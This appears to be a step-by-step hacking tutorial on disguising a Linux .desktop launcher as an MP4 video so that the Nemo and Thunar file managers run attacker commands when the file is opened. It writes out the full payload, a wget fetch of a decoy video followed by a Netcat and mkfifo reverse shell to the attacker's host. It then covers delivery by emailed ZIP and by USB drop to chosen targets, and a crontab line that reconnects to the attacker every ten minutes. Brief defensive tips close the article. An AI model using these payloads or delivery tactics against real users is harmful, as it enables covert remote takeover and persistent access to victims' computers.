What appears to be an ordinary MP4 may have been designed by an attacker to compromise your Linux Mint operating system. Opening the file will indeed play the intended video, but it will also silently create a connection to the attacker’s system.
Two files are being extracted in the GIF. The first (real_video.mp4) is a real MP4 of a movie trailer. The second file (fake_video.mp4) is a .desktop file, configured to look like an ordinary MP4 in this file manager. What we can’t see in the GIF is the Netcat connection being made to the attacker’s system when fake_video.mp4 opens. The target believes fake_video.mp4 is legitimate and has no idea the operating system was just compromised.
The .desktop file extension is used in Linux systems to create application launchers. Linux Mint users can list files in the /usr/share/applications/ directory for some examples of this.
$ ls -l /usr/share/applications/*.desktop -rw-r--r-- 1 root root 125 Nov 4 2017 /usr/share/applications/apturl.desktop -rw-r--r-- 1 root root 8754 Nov 28 04:55 /usr/share/applications/blueberry.desktop -rw-r--r-- 1 root root 1383 Jan 11 11:41 /usr/share/applications/bluetooth-sendto.desktop -rw-r--r-- 1 root root 363 Mar 21 09:45 /usr/share/applications/cinnamon2d.desktop -rw-r--r-- 1 root root 448 Dec 6 05:22 /usr/share/applications/cinnamon-color-panel.desktop -rw-r--r-- 1 root root 300 Dec 6 05:22 /usr/share/applications/cinnamon-control-center.desktop -rw-r--r-- 1 root root 463 Mar 21 09:45 /usr/share/applications/cinnamon.desktop -rw-r--r-- 1 root root 496 Dec 6 05:22 /usr/share/applications/cinnamon-display-panel.desktop -rw-r--r-- 1 root root 200 Mar 21 09:45 /usr/share/applications/cinnamon-killer-daemon.desktop -rw-r--r-- 1 root root 272 Mar 21 09:45 /usr/share/applications/cinnamon-menu-editor.desktop -rw-r--r-- 1 root root 450 Dec 6 05:22 /usr/share/applications/cinnamon-network-panel.desktop -rw-r--r-- 1 root root 504 Dec 6 05:22 /usr/share/applications/cinnamon-online-accounts-panel.desktop -rw-r--r-- 1 root root 11580 Mar 21 09:45 /usr/share/applications/cinnamon-onscreen-keyboard.desktop -rw-r--r-- 1 root root 504 Dec 6 05:22 /usr/share/applications/cinnamon-region-panel.desktop -rw-r--r-- 1 root root 433 Dec 11 03:24 /usr/share/applications/cinnamon-screensaver.desktop -rw-r--r-- 1 root root 12473 Mar 21 09:45 /usr/share/applications/cinnamon-settings-applets.desktop ... -rw-r--r-- 1 root root 506 Dec 15 2017 /usr/share/applications/seahorse.desktop -rw-r--r-- 1 root root 10609 Mar 26 2018 /usr/share/applications/simple-scan.desktop -rw-r--r-- 1 root root 8996 May 10 2018 /usr/share/applications/synaptic.desktop -rw-r--r-- 1 root root 518 Apr 3 2018 /usr/share/applications/system-config-printer.desktop -rw-r--r-- 1 root root 10062 Mar 25 07:28 /usr/share/applications/thunderbird.desktop -rw-r--r-- 1 root root 820 Nov 30 08:53 /usr/share/applications/timeshift-gtk.desktop -rw-r--r-- 1 root root 11701 Aug 2 2017 /usr/share/applications/tomboy.desktop -rw-r--r-- 1 root root 4493 Feb 6 2018 /usr/share/applications/transmission-gtk.desktop -rw-r--r-- 1 root root 3617 Apr 10 2018 /usr/share/applications/vim.desktop -rw-r--r-- 1 root root 9870 Oct 6 2018 /usr/share/applications/vlc.desktop -rw-r--r-- 1 root root 992 Dec 10 11:48 /usr/share/applications/xdg-desktop-portal-gtk.desktop -rw-r--r-- 1 root root 4526 Dec 11 06:10 /usr/share/applications/xed.desktop -rw-r--r-- 1 root root 9762 Dec 11 06:12 /usr/share/applications/xplayer.desktop -rw-r--r-- 1 root root 8056 Dec 11 06:15 /usr/share/applications/xreader.desktop -rw-r--r-- 1 root root 5309 Dec 11 06:18 /usr/share/applications/xviewer.desktop -rw-r--r-- 1 root root 3780 Dec 17 05:45 /usr/share/applications/yelp.desktop
Viewing this directory in Linux Mint’s built-in file manager, Nemo, the very same .desktop files appear as clickable buttons.
Using cat on one of the operating system’s legitimate .desktop files will display the following data.
$ cat /usr/share/applications/cinnamon-settings-calendar.desktop [Desktop Entry] Icon=cs-date-time Exec=cinnamon-settings calendar Type=Application OnlyShowIn=X-Cinnamon; Categories=Settings;
The most important lines to take note of are the Icon= and Exec= values. The Icon value is responsible for the icon used to represent the .desktop file. The Exec value is responsible for the command(s) executed when the target clicks the .desktop file. In this case, clicking the file executes the cinnamon-settings command with the calendar option. Clicking this file will open the “Date & Time” settings window.
An attacker can abuse this functionality to change how the .desktop file appears to the user and which program(s) launch when the file is clicked as it resides in the file manager.
There are several noteworthy desktop environments (DE) that are affected by this issue. They include: GNOME, Cinnamon, MATE, KDE, XFCE4, and LXDE. While this is far from a comprehensive list of available DEs, these are among the most popular.
Each DE uses a different file manager by default. For example, GNOME uses the Nautilus file manager, and KDE uses the Dolphin file manager. Neither of these file managers is vulnerable to this attack. But! Keep in mind — it’s possible to install and use multiple file managers in a single operating system, much like having two different web browsers installed simultaneously. So a GNOME target with Nautilus installed may be using a different, vulnerable file manager.
The goal of this article is to shed some light on the vulnerability in Cinnamon’s default file manager, Nemo. Nemo, like the Thunar file manager found in XFCE4 systems, is vulnerable to this attack.
In my short series of tests against popular operating systems, here’s what I was able to determine, ordered in the following OS/DE/File-Manager format.
- Ubuntu 18.04/GNOME/Nautilus
- Debian 10/GNOME/Nautilus
- Elementary OS 5/Pantheon/Pantheon-Files
- Manjaro 18/KDE/Dolphin
- Linux Mint 19.2/Cinnamon/Nemo
- Xubuntu 18.04/XFCE4/Thunar
- Fedora 30/MATE/Caja
- MX Linux/XFCE4/Thunar
Identifying if the target is using a vulnerable file manager is not an easy task, especially if the attacker knows nothing about the target’s operating system. However, if the attacker shares a Wi-Fi network with the target, it would be possible to observe traffic transmitting to and from the operating system. The DNS requests for a Linux Mint operating system appear as follows.
Similarly, MX Linux operating systems use custom repositories as well (shown below) when fetching system updates.
Determining the DE or file manager may not be possible without the target sharing some identifiable information on social media or some other means. Be sure to leave tips and ideas for enumerating this information in the comments!
We’ll need to set up a simple HTTP server in Kali to host the real_video.mp4 file. When the target clicks on the fake_video.desktop, it will silently download and automatically play the real_video.mp4. As root, start by installing Python3 on your Kali system.
~# apt-get update && apt-get install python3 Reading package lists... Done Reading package lists... Done Building dependency tree Reading state information... Done python3 is already the newest version (3.7.2-1). python3 set to manually installed. 0 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.
Then, use the mkdir command to create a temporary directory to store the attack files we’re creating.
~# mkdir -p /tmp/pythonServer/videos
Then, change into the new videos directory.
~# cd /tmp/pythonServer/videos/
YouTube-dl is a cross-platform command-line tool used to download YouTube videos. The version of youtube-dl in the Kali Linux repository is usually a bit outdated, so reference the GitHub repo for the latest version. Use the below command to install it.
~# curl -L https://yt-dl.org/downloads/latest/youtube-dl -o /usr/local/bin/youtube-dl % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 1709k 100 1709k 0 0 70872 0 0:00:24 0:00:24 --:--:-- 406k
Then, give the new youtube-dl binary permissions to run on the system with the chmod command.
~# chmod a+rx /usr/local/bin/youtube-dl
In real scenarios, relevant videos should be used to trick the target user into believing the fake_video file is, in fact, a real video. For demonstration purposes, I’ll be using the rickroll.
~# youtube-dl --restrict-filenames -f 18 'https://www.youtube.com/watch?v=dQw4w9WgXcQ' dQw4w9WgXcQ: Downloading webpage dQw4w9WgXcQ: Downloading video info webpage dQw4w9WgXcQ: Downloading js player vflptN-I_ dQw4w9WgXcQ: Downloading js player vflptN-I_ [download] Destination: Rick_Astley_-_Never_Gonna_Give_You_Up_Official_Music_Video-dQw4w9WgXcQ.mp4 [download] 100% of 15.18MiB in 00:07
The filename will likely consist of erroneous characters. For the sake of simplicity, rename the video file. Use the below mv command with the wildcard (*) to rename it.
~# mv Rick*.mp4 real_video.mp4
The ls command can then be used to view the directory’s contents and the renamed file.
~# ls -l -rw-r--r-- 1 root root 15915462 Dec 10 01:55 real_video.mp4
Use a preferred text editor like Gedit, Geany, Vim, or nano to create a new “fake_video.desktop” file. The below example uses nano.
~# nano fake_video.desktop
Then, copy the below text into the new file. The .desktop file extension is vital; the attack won’t work without it.
#!/usr/bin/env xdg-open [Desktop Entry] Encoding=UTF-8 Name=fake_video.mp4 Exec=/usr/bin/wget 'http://192.168.1.XX/real_video.mp4' -O /tmp/real_video.mp4; /usr/bin/xdg-open /tmp/real_video.mp4; /usr/bin/mkfifo /tmp/f; /bin/nc 192.168.1.XX 1234 < /tmp/f | /bin/bash -i > /tmp/f 2>&1 & Terminal=false Type=Application Icon=video-x-generic
Several commands are executed (Exec=) and concatenated into one line, separated by semi-colons. I’ll break the one-liner into parts to better explain each command.
- /usr/bin/wget ‘http://192.168.1.XX/real_video.mp4’ -O /tmp/real_video.mp4; — Wget downloads the real_video.mp4 file from the attacker’s system to the target’s. It is saved (-O) to the /tmp directory with the same filename. Throughout the payload, change the 192.168.1.XX address to the IP address of the attacker’s Kali system.
- /usr/bin/xdg-open /tmp/real_video.mp4; — The xdg-open command will open files with the target’s operating system’s preferred video player. If the target prefers VLC over MPV or another Linux video player, the real_video.mp4 will automatically play on VLC. Opening the video with the preferred media player will hopefully prevent the target from discovering the fake_video.desktop.
- /usr/bin/mkfifo /tmp/f; — Mkfifo will create a named pipe to redirect all of the following Netcat data to and from the attacker’s system.
- /bin/nc 192.168.1.XX 1234 < /tmp/f | /bin/bash -i > /tmp/f 2>&1 & — Netcat and Bash are used (with the named pipe) to connect back to the attackers systems (remember to change the XX in the IP address here to that of the attacker’s system). The port number (1234) is arbitrary and can be any number between 1 and 65535.
The Icon= image can be changed here. Icon filenames are found in the /usr/share/icons/Mint-Y/mimetypes/128/ directory. The file extension (.png) can be omitted when creating .desktop files, but it’s not necessary. Any file in the /usr/share/icons/ directory can be used as a .desktop file icon. For example, text files (text-x-generic), ZIP files ( package-x-generic), and every other filetype with a supporting PNG in the icons/ directory is usable. There’s a lot of room to be creative with social engineering attacks here (fake ZIP file shown below).
Change the fake_video.desktop file permissions with the chmod command to elevate its privileges.
~# chmod +x fake_video.desktop
The new permissions are verified by listing the directory contents. Notice the execute (-rwxr-xr-x) permissions.
~# ls -l -rwxr-xr-x 1 root root 353 Apr 12 06:27 fake_video.desktop -rw-r--r-- 1 root root 15915462 Dec 10 01:55 real_video.mp4
Python3 will create a web server on port 80, making the real_video.mp4 in the directory available to everyone on the network. Alternatively, this web server can be set up on a virtual private server for remote targets.
~# python3 -m http.server 80 Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
The Python3 terminal must remain open until the target clicks on the fake_video.desktop file. If the Python3 server is not accessible when the target opens the fake_video, no video will play, but the target’s computer will still establish the Netcat connection.
Netcat will listen (-l) on every available IPv4 interface using port (-p) 1234. This port number is arbitrary, but remember to reflect the change in the fake_video.desktop Exec= command created in Step 5. The -vv will print a more verbose, detailed output. Verbose outputs can be helpful when debugging connections.
~# nc -vv -l -p 1234
With the Python3 and Netcat servers setup, the attacker can deliver fake_video.desktop to the target. I’ve outlined two simple delivery methods below, but this is far from an exhaustive list of attack vectors. Other tactics are possible if the attacker knows more about the target.
Email is a good file sharing vector. If the target’s operating system has been discovered or it’s known that Linux systems are deployed in the workplace email delivery will be an ideal option. In this scenario, compressing the file(s) with zip is necessary to bypass email clients and web browsers from displaying the .desktop file extension when sharing the file.
It may be desirable to include many .desktop payloads in the ZIP sent to the target for a convincing social engineering attack. Or, perhaps mixing real files in with fake_videos.
First, make sure zip is installed, as it isn’t included in all versions of Kali.
~# apt-get install zip Reading package lists... Done Building dependency tree Reading state information... Done The following NEW packages will be installed: zip 0 upgraded, 1 newly installed, 0 to remove and 0 not upgraded. Need to get 234 kB of archives. After this operation, 623 kB of additional disk space will be used. Fetched 234 kB in 6s (37.4kB/s) Selecting previously unselected package zip. (Reading database ... 175224 files and directories currently installed.) Preparing to unpack .../zip_3.0-11+b1_amd64.deb ... Unpacking zip (3.0-11+b1) ... Setting up zip (3.0-11+b1) ... Processing triggers for man-db (2.8.5-2) ...
While in the videos/ directory, use the below zip command to compress all of the files in the directory.
~# zip -r videos.zip ../videos/ adding: ../videos/ (stored 0%) adding: ../videos/real_video.mp4 (deflated 0%) adding: ../videos/fake_video.desktop (deflated 33%)
Zip will recursively (-r) compress all of the files in the ../videos/ directory into a “videos.zip” file. When that’s done, the videos.zip file can be emailed to the target(s).
Readers may know I’m a fan of USB drop attacks. Nearly 50% of all USBs found in the wild are picked up, inserted into a computer, and inspected by unsuspecting targets. The lone USB is an excellent attack vector as it specifically targets the computer — an email attachment may be opened using the target’s smartphone. When the target inserts the USB drive into his/her machine, Nemo will automatically attempt to mount it and display the fake_video.desktop as “fake_video.mp4” — so compressing the files won’t be necessary.
For more on the science of targeted social engineering attacks, check out “Hack WPA2 Wi-Fi Passwords Using USB Dead Drops.” Similarly, shared USBs in the workplace can be configured to mimic or clone real files on the USB and swap them with malicious payloads.
To perform a USB drop attack, start by inserting the USB drive intended for the target into the Kali system. Then, mount the USB drive and use the below cp command to copy the fake_video.desktop to the drive.
~# cp /tmp/pythonServer/videos/*.desktop /media/root/USB NAME HERE/
Then, eject the USB drive and leave it some place only the intended target(s) will find.
When the fake_video.desktop is clicked, it will establish a connection to the Netcat listener (shown below).
~# nc -vv -l -p 1234 listening on [any] 1234 ... connect to [192.168.1.XX] from () [192.168.1.78] 37538 target_user@Linux-Mint:~$
At this point, it’s usually a good idea to establish some degree of persistence in the target’s computer. In the event the original Netcat connection is lost or terminated, it may be desirable to have some way of reconnecting to the compromised Linux Mint device. A simple form of persistence can be configured using crontab.
Cron is a task scheduler found in Mint and Ubuntu operating systems. Cron jobs are often used by system administrators to automate repetitive tasks, such as creating weekly backups, and executing a specific task when the OS reboots.
To ensure Netcat is maintaining the connection back to the attacker’s system, echo the below commands into crontab. These commands will instruct the Mint device to connect to the attacker’s server every ten minutes.
echo '*/10 * * * * /usr/bin/mkfifo /tmp/v; /bin/nc 192.168.1.XX 9999 < /tmp/v | /bin/bash -i > /tmp/v 2>&1 &' | crontab -
These are the same mkfifo and Netcat commands used in the fake_video.desktop payload in Step 5. To receive connections from the target’s machine, start a new Netcat listener in the Kali system.
~# nc -vv -l -p 9999
As long as the target is connected to the same network, the compromised device will connect back to the Netcat listener every ten minutes. If the Netcat listener isn’t up and running, the target computer will silently fail and try again at the next interval.
- File Managers — The Nemo and Thunar file managers found in Cinnamon and XFCE4 are vulnerable to this kind of attack. Try the Nautilus or Dolphin file managers instead. They can be installed using the below command.
~# apt-get install nautilus dolphin
After installing them, open the Preferred Applications settings.
Change the File Manager to “Files” with blue file icon, this is Nautilus.
Clicking on folders will now open the Nautilus file manager and not Nemo. The fake_video.desktop will appear in its true form when using this file manager.
- Sandboxes — It’s possible to sandbox specific applications and processes with tools like Firejail. Firejail reduces the risk of security breaches by using lightweight visualization technology to isolate applications and restrict them to sandboxed (container) environments. The below GIF demonstrates opening an unsafe file in a heavily sandboxed environment.
For more on hardening Ubuntu-based operating systems like Linux Mint, check out “Using Ubuntu as Your Primary OS, Part 3 (Application Hardening & Sandboxing).”
- Right-Click — Double-clicking on random files is generally considered good practice. In the case of this attack, right-clicking on the files and attempting to open them with a particular program reveals the fake_video.mp4 is recommending text editors and not video players like VLC and MPV. That’s because the operating system knows it’s a .desktop file containing text.